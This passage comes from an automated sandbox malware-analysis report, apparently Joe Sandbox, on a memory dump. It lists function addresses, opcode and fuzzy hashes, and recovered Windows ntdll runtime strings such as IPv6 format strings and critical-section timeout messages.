                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 74075636b22494de74b6a45107d614f7eee5222404da2bab01440674c57b4bbe
                                                                                  • Instruction ID: 789427eb16294dc110330945be33c23821a2b8efd9355950b08ace754d9a5dd5
                                                                                  • Opcode Fuzzy Hash: 74075636b22494de74b6a45107d614f7eee5222404da2bab01440674c57b4bbe
                                                                                  • Instruction Fuzzy Hash: 5490026921350006D1807158540870E000997D2303F95D415A5059558CC9158A6D5322
                                                                                  Function 01852D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dbd1f2b9e9315a96eb47b6d3a45de715efafd0d47e543bc3a2fbbf2a04c3dcd6
                                                                                  • Instruction ID: d2be7b415dcdb08ee08355891fd0632b6e7e4246d15b9376d08be574e2f510ed
                                                                                  • Opcode Fuzzy Hash: dbd1f2b9e9315a96eb47b6d3a45de715efafd0d47e543bc3a2fbbf2a04c3dcd6
                                                                                  • Instruction Fuzzy Hash: 2190026130150007D1407158541870A4009E7E2302F55D011E5458554CD9158A5A5323
                                                                                  Function 01852CA0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2e08a29c23acb5a65cdff2912115c6992c1bac6090b457829887c3e5b2483f0d
                                                                                  • Instruction ID: 5c791858a9fc395ce8e9b92aa742c25d5ee52d033a420dc10f3de658a89d08a1
                                                                                  • Opcode Fuzzy Hash: 2e08a29c23acb5a65cdff2912115c6992c1bac6090b457829887c3e5b2483f0d
                                                                                  • Instruction Fuzzy Hash: 7390027120150406D1007598540874A000997E1302F55D011AA068555EC6658A956232
                                                                                  Function 01852CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8519c3a600c8d77b2ff2e9580140940deded55adf6e873f46a453dc8cd3eff78
                                                                                  • Instruction ID: 61737690e311f4524a380325cafb24003a01829ffa3962e1a737cbed240cd113
                                                                                  • Opcode Fuzzy Hash: 8519c3a600c8d77b2ff2e9580140940deded55adf6e873f46a453dc8cd3eff78
                                                                                  • Instruction Fuzzy Hash: 2390026160550406D1407158541870A001997D1302F55D011A5068554DC6598B5967A2
                                                                                  Function 01852CF0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 13460bad9d6ab0a8d0332f6fdd2f40ea6df0d855a2daab3567d0e4f3391935cf
                                                                                  • Instruction ID: c59a31b689d773aa8878a03b99734a66069c24c5438a93e60732166d257de6a0
                                                                                  • Opcode Fuzzy Hash: 13460bad9d6ab0a8d0332f6fdd2f40ea6df0d855a2daab3567d0e4f3391935cf
                                                                                  • Instruction Fuzzy Hash: E290027120150407D1007158550870B000997D1302F55D411A5468558DD6568A556222
                                                                                  Function 01852C60 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dee2f65e7b6f8b7993b405398782f27d96f8b956663450d99d076b1faf276af6
                                                                                  • Instruction ID: 9315a2eb834fdf64eecfd00cbc55f9ef76547089f35f0214d2301b99f5a745f9
                                                                                  • Opcode Fuzzy Hash: dee2f65e7b6f8b7993b405398782f27d96f8b956663450d99d076b1faf276af6
                                                                                  • Instruction Fuzzy Hash: EF90027120150846D10071584404B4A000997E1302F55C016A5168654DC615CA557622
                                                                                  Function 01852F90 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: de3a92a490ffabb41b4fc3c39c76d47f3de73693860b9bafeb6e99db3e5e3df7
                                                                                  • Instruction ID: ee4e0419c6def883c1d012597ce737b20d8e60019b315f16fdbb623b37c937de
                                                                                  • Opcode Fuzzy Hash: de3a92a490ffabb41b4fc3c39c76d47f3de73693860b9bafeb6e99db3e5e3df7
                                                                                  • Instruction Fuzzy Hash: C490027120190406D1007158481470F000997D1303F55C011A61A8555DC6258A556672
                                                                                  Function 01852FA0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1dba313860f817b84993aef6a0a67af400a8955f117c526890c1b29abd7cb8cc
                                                                                  • Instruction ID: 49034d77c0c7e21d1e8753448aa4ddc8ac376e23d9005b984d4d8e9ef53c8071
                                                                                  • Opcode Fuzzy Hash: 1dba313860f817b84993aef6a0a67af400a8955f117c526890c1b29abd7cb8cc
                                                                                  • Instruction Fuzzy Hash: BF90027120190406D1007158480874B000997D1303F55C011AA1A8555EC665CA956632
                                                                                  Function 01852FB0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 65a5c9a347c8f48c86c22681bbbe964d17792144cf149ac19cccf12abe984c01
                                                                                  • Instruction ID: ab90d77a1d5d4e049ab6b9110945223b8ed46a297b7660cf1c84d6a3c889156e
                                                                                  • Opcode Fuzzy Hash: 65a5c9a347c8f48c86c22681bbbe964d17792144cf149ac19cccf12abe984c01
                                                                                  • Instruction Fuzzy Hash: FD90026160150046414071688844A0A4009BBE2312755C121A59DC550DC5598A695766
                                                                                  Function 01852FE0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3711ed675d8707a013c506d02151ddabf416eeb70a2203c5238fba32a08b6280
                                                                                  • Instruction ID: 9b875272bbfa59c730c100c8ea67fed0153b72e0af002a056358f1b819cb7bb6
                                                                                  • Opcode Fuzzy Hash: 3711ed675d8707a013c506d02151ddabf416eeb70a2203c5238fba32a08b6280
                                                                                  • Instruction Fuzzy Hash: 46900261211D0046D20075684C14B0B000997D1303F55C115A5198554CC9158A655622
                                                                                  Function 01852F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dc74d3a9a1273102593899ae408970515a6bad686c059a258a4bf8b5d6bef817
                                                                                  • Instruction ID: ab409fed1618c2620b7221c3cc68221704cfbb38bc01b68edc591f4eabcfcedf
                                                                                  • Opcode Fuzzy Hash: dc74d3a9a1273102593899ae408970515a6bad686c059a258a4bf8b5d6bef817
                                                                                  • Instruction Fuzzy Hash: 3C9002A134150446D10071584414B0A0009D7E2302F55C015E60A8554DC619CE566227
                                                                                  Function 01852F60 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dd8814583c11337ec0748705d1a83508a9b44923097c0a9e92b00be2af8c3f53
                                                                                  • Instruction ID: 40f39740033431ffce4dc58357ab4f5fdd50ce1a61e5d3c302c178bd1f411e90
                                                                                  • Opcode Fuzzy Hash: dd8814583c11337ec0748705d1a83508a9b44923097c0a9e92b00be2af8c3f53
                                                                                  • Instruction Fuzzy Hash: EA9002A121150046D1047158440470A004997E2302F55C012A7198554CC5298E655226
                                                                                  Function 01852E80 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f4ad8924df94c625d09af8a278f4ee5af00ede85cca0a13617d3b320ed76765f
                                                                                  • Instruction ID: 2a445a10d12478d91eecc6fd10d023867c3d3e98cf09cee1090139dc95032271
                                                                                  • Opcode Fuzzy Hash: f4ad8924df94c625d09af8a278f4ee5af00ede85cca0a13617d3b320ed76765f
                                                                                  • Instruction Fuzzy Hash: 9890026160150506D1017158440471A000E97D1342F95C022A6068555ECA258B96A232
                                                                                  Function 01852EA0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 03efd95a41333328753ca3e2832e1456b15da1d8b07c0bff1ea4edcc746ea328
                                                                                  • Instruction ID: d12f4beaa499f1c3dec52381d1938d7fd1b3813df7eb968d2c7badbda79907c6
                                                                                  • Opcode Fuzzy Hash: 03efd95a41333328753ca3e2832e1456b15da1d8b07c0bff1ea4edcc746ea328
                                                                                  • Instruction Fuzzy Hash: AC9002B120150406D1407158440474A000997D1302F55C011AA0A8554EC6598FD96766
                                                                                  Function 01852EE0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 94d52be123b91ac78d2dfe5302b610afbe848ec1461e70bdbf36506aa87da37c
                                                                                  • Instruction ID: 6feddefddbaf272474b12b92d8ef1010ea6dbedb7ddfec55832e91c208de111a
                                                                                  • Opcode Fuzzy Hash: 94d52be123b91ac78d2dfe5302b610afbe848ec1461e70bdbf36506aa87da37c
                                                                                  • Instruction Fuzzy Hash: 459002A120190407D1407558480470B000997D1303F55C011A70A8555ECA298E556236
                                                                                  Function 01852E30 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8af9d6722e51c71df6c53044ed22cf40815204d1dbb1ebfeeb46d4436a4c579c
                                                                                  • Instruction ID: 502f44d1837309a210e5b0964d895a7b57db8ab8ceb5bbd5c9b67b85237b36ba
                                                                                  • Opcode Fuzzy Hash: 8af9d6722e51c71df6c53044ed22cf40815204d1dbb1ebfeeb46d4436a4c579c
                                                                                  • Instruction Fuzzy Hash: 8F90026130150406D1027158441470A000DD7D2346F95C012E6468555DC6258B57A233
                                                                                  Function 01853090 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: eb061b1a9b311413ca1daca6dfdad4268fca95452c112fea378b763d39d62918
                                                                                  • Instruction ID: 53bc8312476e77bd261fcdf75baf6624ebd4a25c6b0accdf707d9fa043533273
                                                                                  • Opcode Fuzzy Hash: eb061b1a9b311413ca1daca6dfdad4268fca95452c112fea378b763d39d62918
                                                                                  • Instruction Fuzzy Hash: 8D90026124150806D1407158841470B000AD7D1702F55C011A5068554DC6168B6967B2
                                                                                  Function 01853010 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 974540950916f57b10ee71ce8cc1fc288880ee67e07e8785d9fa1788f65ab91e
                                                                                  • Instruction ID: 2fda24f3bc4432aa6e92c0be3b0bd67c17e47fc818ab54c7ba0765a35ac5b59e
                                                                                  • Opcode Fuzzy Hash: 974540950916f57b10ee71ce8cc1fc288880ee67e07e8785d9fa1788f65ab91e
                                                                                  • Instruction Fuzzy Hash: D390026120194446D14072584804B0F410997E2303F95C019A919A554CC9158A595722
                                                                                  Function 018539B0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 307672ffc0709b47c9e90fca076f7cd02cbd8a696acd83626c4608f72deba18c
                                                                                  • Instruction ID: dbcd8043db9ef0987bf7f53df8dc48b0e34ec07b6b99017a19855dbccff54594
                                                                                  • Opcode Fuzzy Hash: 307672ffc0709b47c9e90fca076f7cd02cbd8a696acd83626c4608f72deba18c
                                                                                  • Instruction Fuzzy Hash: D190026124555106D150715C440471A4009B7E1302F55C021A5858594DC5558A596322
                                                                                  Function 01852C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction ID: 175cc0f4265646630895a4bcaff0b890347b4f3a270fb8a29a550a80a3486ea9
                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Function 01852890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: 7f44c372ece56943126d72de8bce590f903e33c1f196509cc4fcfab4ca7bfa66
                                                                                  • Instruction ID: 66832aca91ea15be7ea65d45e2ecd669a534775dc43b453f8ea013ac8c618048
                                                                                  • Opcode Fuzzy Hash: 7f44c372ece56943126d72de8bce590f903e33c1f196509cc4fcfab4ca7bfa66
                                                                                  • Instruction Fuzzy Hash: E251F5B6A0411AAFCB55EB9C889097EFBB9FB08344714822AF8A5D7641D734DF4087A1
                                                                                  Function 018C2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: 32db891846bd00ca840266004677ff0a8645635cea41274cc0efb0fcf1213be6
                                                                                  • Instruction ID: 2835aff711710a667a10779b8a16e321dcecb1bf01de38a678510b4a4442d75e
                                                                                  • Opcode Fuzzy Hash: 32db891846bd00ca840266004677ff0a8645635cea41274cc0efb0fcf1213be6
                                                                                  • Instruction Fuzzy Hash: E8510475A00649AFCB71DE9CC89087FFBFAAB54700B04846EF496D36C1E674DB408760
                                                                                  Function 01847630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • Execute=1, xrefs: 01884713
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018846FC
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01884787
                                                                                  • ExecuteOptions, xrefs: 018846A0
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01884725
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01884655
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01884742
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  • Opcode ID: 7f9ba70bf528955eabf362169f4d635089061e4a3263336c07083121595cb5c6
                                                                                  • Instruction ID: bb725f8dcd794663438608420f27e147289b857669e3493ed623ab9bca5b1b5f
                                                                                  • Opcode Fuzzy Hash: 7f9ba70bf528955eabf362169f4d635089061e4a3263336c07083121595cb5c6
                                                                                  • Instruction Fuzzy Hash: A251187160021EABEF21EBA9DC95FAA77B9EF14304F4400A9D605E7281EB709F45CF51
                                                                                  Function 018E6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction ID: aca20a6c5212145186263650f2e4b4f0bd57cb19e510225d7b5b875577843357
                                                                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction Fuzzy Hash: CF022671508342AFD705CF18C494A6FBBE5FFD5704F648A2DB9958B250EB31EA05CB82
                                                                                  Function 0185B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction ID: c0fd7fe4c7cbb337bc7ce5a696cb3ec72474d7df15d4656bf008644882bc3219
                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction Fuzzy Hash: DB81C170E052499FEFA58E6CC8917FEBBB3EF65360F184159EC61E7291C7348A408B61
                                                                                  Function 018C20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$[$]:%u
                                                                                  • API String ID: 48624451-2819853543
                                                                                  • Opcode ID: 4db9825f4003823ca2fe94c4b91c2c656df523fddcc10f038368b6173c460340
                                                                                  • Instruction ID: 6b22933c40d447577d701582df25c04ff40d4883f70ef494709698e7288c4e1a
                                                                                  • Opcode Fuzzy Hash: 4db9825f4003823ca2fe94c4b91c2c656df523fddcc10f038368b6173c460340
                                                                                  • Instruction Fuzzy Hash: DC21337AA00519ABDB11DE6DDC40AAE7BF9EF94B54F44012AED45D3240E730EB018BA1
                                                                                  Function 0183F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 0188031E
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018802E7
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018802BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  • Opcode ID: 18acd0cc11835d653e447a3db5d8cc05f01585cea89d4dafb09897a5780c855d
                                                                                  • Instruction ID: 16102235c469313b93922dc794a73773f378270213448da9727d2b717fa123de
                                                                                  • Opcode Fuzzy Hash: 18acd0cc11835d653e447a3db5d8cc05f01585cea89d4dafb09897a5780c855d
                                                                                  • Instruction Fuzzy Hash: 26E17F71A047459FD726DF28C884B2ABBE0BB84314F180A5DF6A5CB2E1D774DA45CB83
                                                                                  Function 0184B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0188728C
                                                                                  Strings
                                                                                  • RTL: Resource at %p, xrefs: 018872A3
                                                                                  • RTL: Re-Waiting, xrefs: 018872C1
                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01887294
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 885266447-605551621
                                                                                  • Opcode ID: 9df1b375af1d36f769b18316362549c5da2429292ed36c72dd463d8181f3d218
                                                                                  • Instruction ID: 0cabe580a2511c3ebfa103b1eded91660822f95b3168c371abea14a8154b094d
                                                                                  • Opcode Fuzzy Hash: 9df1b375af1d36f769b18316362549c5da2429292ed36c72dd463d8181f3d218
                                                                                  • Instruction Fuzzy Hash: D241033170020AABDB21EE29CC81B66BBB5FF54714F240619F956DB241DB31EA52C7D1
